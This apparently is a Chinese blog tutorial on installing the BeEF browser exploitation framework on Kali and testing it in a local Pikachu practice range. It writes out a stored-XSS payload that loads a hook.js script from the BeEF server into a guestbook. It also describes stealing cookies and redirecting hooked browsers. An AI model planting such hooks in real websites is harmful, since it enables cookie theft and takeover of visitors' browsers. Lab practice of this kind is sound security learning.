一、背景
BeEF是The Browser Exploitation Framework的缩写。它是一种专注于Web浏览器的渗透测试工具。
随着对包括移动客户端在内的客户网络攻击的担忧日益增加,BeEF允许专业渗透测试人员使用客户端攻击媒介来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了强化的网络边界和客户端系统,并在一个开放的环境中检查可利用性:Web浏览器。BeEF将挂钩一个或多个Web浏览器,并将它们用作启动定向命令模块以及从浏览器上下文中对系统进一步攻击的滩头阵地。
BeEF xss除了是XSS漏洞利用工具,还是一个XSS平台搭建工具,可以本地搭建也可以服务器上搭建,唯一的缺点是:不支持Windows
之前弄过一次,不过失败了。现在重来一遍。首先在kali安装,我的镜像源不是国内的所以安装失败,将源改为中科大的然后apt-get update就行了。参考:https://blog.csdn.net/qq_45766004/article/details/110011811
二、安装使用
在kali终端一键安装,如果是ubuntu可能复杂点,要安装各种依赖
sudo apt-get install beef-xss
启动beef
这里提示不能使用默认的账户密码,所以去配置文件中修改。这里我们修改为admin/admin
./beef再次启动(成功)
打开浏览器访问:http://192.168.238.134:3000/ui/panel
使用这里用本地搭建的pikachu靶场,测试beef-xxs
将这段js代码 输入到留言板
<script src=http://192.168.238.134:3000/hook.js></script>
点击提交后,查看beef-xss平台。成功上线。
在commands模块查看cookie
网页跳转模块
成功跳转到百度,因为没法录像只能截图所以效果不明显。
这个只是局域网搭建的,可以在公网服务器搭建,有时间试试。更多功能,以后再慢慢补充。